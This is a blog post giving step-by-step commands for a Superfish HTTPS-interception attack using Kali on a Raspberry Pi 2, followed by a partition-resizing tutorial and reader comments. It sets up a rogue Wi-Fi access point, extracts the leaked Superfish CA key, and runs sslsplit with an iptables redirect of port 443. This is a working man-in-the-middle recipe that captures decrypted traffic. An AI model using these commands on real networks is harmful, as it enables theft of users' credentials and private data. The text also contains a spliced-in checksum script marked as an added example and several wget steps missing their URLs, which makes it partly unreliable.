
SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.

A: Preparation of kali

  1. Download kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. Verify the download before writing it. MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef
     SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD to RP2, connect network and power-up
  6. SSH to kali using default user:password (root:toor)
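The checksums in step 3 only help if they are compared before the image goes onto the SD card. The following POSIX shell function is an added example (not part of the original post): it hashes a downloaded file with md5sum and sha1sum from coreutils and refuses it on any mismatch against the values listed above.

```shell
#!/bin/sh
# Added example: verify a downloaded image against published checksums.
# Expected values are the ones listed for kali-0.1-rpi.img.xz above.
KALI_MD5="277ac5f1cc2321728b2e5dcbf51ac7ef"
KALI_SHA1="d45ddaf2b367ff5b153368df14b6a781cded09f6"

# verify_image FILE EXPECTED_MD5 EXPECTED_SHA1
# Returns 0 only when both digests match; reports each mismatch on stderr.
# Assumes coreutils md5sum/sha1sum (present on Kali/Debian).
verify_image() {
    file=$1
    want_md5=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    want_sha1=$(printf '%s' "$3" | tr 'A-F' 'a-f')

    if [ ! -f "$file" ]; then
        echo "verify_image: $file: no such file" >&2
        return 2
    fi

    have_md5=$(md5sum "$file" | cut -d' ' -f1)
    have_sha1=$(sha1sum "$file" | cut -d' ' -f1)

    status=0
    if [ "$have_md5" != "$want_md5" ]; then
        echo "MD5 mismatch: expected $want_md5, got $have_md5" >&2
        status=1
    fi
    if [ "$have_sha1" != "$want_sha1" ]; then
        echo "SHA-1 mismatch: expected $want_sha1, got $have_sha1" >&2
        status=1
    fi
    if [ "$status" -eq 0 ]; then
        echo "$file: checksums OK"
    fi
    return "$status"
}

# Run directly as: sh verify.sh kali-0.1-rpi.img.xz
if [ -n "${1:-}" ]; then
    verify_image "$1" "$KALI_MD5" "$KALI_SHA1"
fi
```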

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated the Pi firmware and kernel (rpi-update) and regenerated the SSH host keys (dpkg-reconfigure openssh-server), since every copy of the image ships with the same keys.

  1. root@kali:~$ passwd
  2. root@kali:~$ adduser davi
  3. root@kali:~$ visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. root@kali:~$ sudo dpkg-reconfigure openssh-server
  10. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable

For example, if instead of a static address you wanted the interface to grab a dynamic one, the wlan0 stanza in the interfaces file would read:

  • davi@kali:~$ sudo vi /etc/network/interfaces

    auto wlan0
    iface wlan0 inet dhcp
        wpa-ssid "SSID"
        wpa-psk "passphrase"

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

  1. davi@kali:~$ wget
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ mkdir /var/log/sslsplit
  8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

Obviously Robert did the hard work figuring this out. I’ve just tested the basics to see what it would take to set up a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple of hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Edimax EW-7811Un wireless USB able to do “infrastructure mode”. Cost $10

Total cost: (re-purposed from other projects) $35 + $18 + $10 = $63
Total time: 20 minutes

Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k

    Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm

Resize the partition

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k

    Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm

Posted in Security.

3 Responses


  1. Stu says

    After hours of finding a guide that I could follow easily – this is by far the best set of instructions for re-sizing partitions! Well, for me it was! Thank you very much for taking the time to write this guide – much appreciated.

  2. Abhishek says

    Thanks for the guide. I’m however stuck now to disable overscan for my Pi with Kali. As there is no boot/config.txt I’m finding it very hard to use my complete screen. Can you please help me out here?

  3. Michael says

    The instructions are concise and work. Thanks.
